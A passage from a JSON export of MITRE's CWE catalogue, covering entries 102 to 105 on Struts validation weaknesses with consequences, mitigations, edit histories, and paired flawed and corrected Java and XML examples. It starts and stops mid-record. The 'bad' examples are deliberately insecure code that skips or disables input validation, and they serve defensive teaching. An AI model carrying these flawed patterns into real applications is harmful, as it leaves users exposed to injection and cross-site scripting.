Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Alternate_Terms, Description, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Other_Notes, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Resource Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Resource Identifiers (aka \'Resource Injection\')","attr":{"@_Date":"2009-05-27"}}]}},"102":{"attr":{"@_ID":"102","@_Name":"Struts: Duplicate Validation Forms","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect.","Extended_Description":"If two validation forms have the same name, the Struts Validator arbitrarily chooses one of the forms to use for input validation and discards the other. This decision might not correspond to the programmer\'s expectations, possibly leading to resultant weaknesses. Moreover, it indicates that the validation logic is not up-to-date, and can indicate that other, more subtle validation errors are present.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"694","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"The DTD or schema validation will not catch the duplicate occurrence of the same form name. To find the issue in the implementation, manual checks or automated static analysis could be applied to the xml configuration files."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Two validation forms with the same name.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form-validation&gt;&lt;/form-validation&gt;","xhtml:div":{"#text":"&lt;formset&gt;&lt;/formset&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;form name=\\"ProjectForm\\"&gt; ... &lt;/form&gt;&lt;form name=\\"ProjectForm\\"&gt; ... &lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"It is critically important that validation logic be maintained and kept in sync with the rest of the application."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Duplicate Validation Forms"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Background_Details, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"103":{"attr":{"@_ID":"103","@_Name":"Struts: Incomplete validate() Method Definition","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().","Extended_Description":"If the code does not call super.validate(), the Validation Framework cannot check the contents of the form against a validation form. In other words, the validation framework will be disabled for the given form.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The Struts Validator uses a form\'s validate() method to check the contents of the form properties against the constraints specified in the associated validation form. That means the following classes have a validate() method that is part of the validation framework: ValidatorForm, ValidatorActionForm, DynaValidatorForm, and DynaValidatorActionForm. If the code creates a class that extends one of these classes, and if that class implements custom validation logic by overriding the validate() method, the code must call super.validate() in the validate() implementation."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"Disabling the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is the root cause of vulnerabilities like cross-site scripting, process control, and SQL injection."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement the validate() method and call super.validate() within that method."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and the RegistrationForm bean in the Struts framework will maintain the user data. Tthe RegistrationForm class implements the validate method to validate the user input entered into the form.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"super();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ActionErrors errors = new ActionErrors();if (getName() == null || getName().length() &lt; 1) {}return errors;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"errors.add(\\"name\\", new ActionMessage(\\"error.name.required\\"));","attr":{"@_style":"margin-left:10px;"}}}]},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {if (getName() == null || getName().length() &lt; 1) {}return errors;","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"super();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ActionErrors errors = super.validate(mapping, request);if (errors == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"errors = new ActionErrors();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"errors.add(\\"name\\", new ActionMessage(\\"error.name.required\\"));","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"Although the validate method is implemented in this example the method does not call the validate method of the ValidatorForm parent class with a call super.validate(). Without the call to the parent validator class only the custom validation will be performed and the default validation will not be performed. The following example shows that the validate method of the ValidatorForm class is called within the implementation of the validate method."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Erroneous validate() Method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":[{"#text":"This could introduce other weaknesses related to missing input validation.","attr":{"@_Type":"Relationship"}},{"#text":"The current description implies a loose composite of two separate weaknesses, so this node might need to be split or converted into a low-level category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Background_Details, Description"}]}},"104":{"attr":{"@_ID":"104","@_Name":"Struts: Form Bean Does Not Extend Validation Class","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"In order to use the Struts Validator, a form must extend one of the following: ValidatorForm, ValidatorActionForm, DynaValidatorActionForm, and DynaValidatorForm. One of these classes must be extended because the Struts Validator ties in to the application by implementing the validate() method in these classes. Forms derived from the ActionForm and DynaActionForm classes cannot use the Struts Validator."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"Bypassing the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is an important component of vulnerabilities like cross-site scripting, process control, and SQL injection."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that all forms extend one of the Validation Classes."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user information from a registration webpage for an online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.action.ActionForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}// getter and setter methods for private variables...","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}// getter and setter methods for private variables...","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":["However, the RegistrationForm class extends the Struts ActionForm class which does not allow the RegistrationForm class to use the Struts validator capabilities. When using the Struts framework to maintain user data in an ActionForm Bean, the class should always extend one of the validator classes, ValidatorForm, ValidatorActionForm, DynaValidatorForm or DynaValidatorActionForm. These validator classes provide default validation and the validate method for custom validation for the Bean object to use for validating input data. The following Java example shows the RegistrationForm class extending the ValidatorForm class and implementing the validate method for validating input data.","Note that the ValidatorForm class itself extends the ActionForm class within the Struts framework API."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Form Bean Does Not Extend Validation Class"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Background_Details"}]}},"105":{"attr":{"@_ID":"105","@_Name":"Struts: Form Field Without Validator","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation.","Extended_Description":"Omitting validation for even a single input field may give attackers the leeway they need to compromise the application. Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Some applications use the same ActionForm for more than one purpose. In situations like this, some fields may go unused under some action mappings."}},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Unexpected State"},{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Note":"If unused fields are not validated, shared business logic in an action may allow attackers to bypass the validation checks that are performed for other uses of the form."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Validate all form fields. If a field is unused, it is still important to constrain it so that it is empty or undefined."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example the Java class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml.","Example_Code":[{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:div":{"#text":"private String name;private String address;private String city;private String state;private String zipcode;private String phone;private String email;public RegistrationForm() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form-validation&gt;&lt;/form-validation&gt;","xhtml:div":{"#text":"&lt;formset&gt;&lt;/formset&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;form name=\\"RegistrationForm\\"&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;field property=\\"name\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"address\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"city\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"state\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"zipcode\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.name\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.address\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.city\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.state\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;[a-zA-Z]{2}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.zipcode\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;\\\\d{5}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}],"xhtml:br":["","","",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"&lt;form-validation&gt;&lt;/form-validation&gt;","xhtml:div":{"#text":"&lt;formset&gt;&lt;/formset&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;form name=\\"RegistrationForm\\"&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;field property=\\"name\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"address\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"city\\" depends=\\"required\\"&gt;&lt;/field&gt;&lt;field property=\\"state\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"zipcode\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"phone\\" depends=\\"required,mask\\"&gt;&lt;/field&gt;&lt;field property=\\"email\\" depends=\\"required,email\\"&gt;&lt;/field&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.name\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.address\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.city\\"/&gt;","attr":{"@_style":"margin-left:10px;"}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.state\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;[a-zA-Z]{2}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.zipcode\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;\\\\d{5}&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.phone\\"/&gt;&lt;var&gt;&lt;/var&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"&lt;var-name&gt;mask&lt;/var-name&gt;&lt;var-value&gt;^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$&lt;/var-value&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"&lt;arg position=\\"0\\" key=\\"prompt.email\\"/&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","",""]}}}}}],"Body_Text":["The validator XML file, validator.xml, provides the validation for the form fields of the RegistrationForm.","However, in the previous example the validator XML file, validator.xml, does not provide validators for all of the form fields in the RegistrationForm. Validator forms are only provided for the first five of the seven form fields. The validator XML file should contain validator forms for all of the form fields for a Struts ActionForm bean. The following validator.xml file for the RegistrationForm class contains validator forms for all of the form fields."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Form Field Without Validator"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 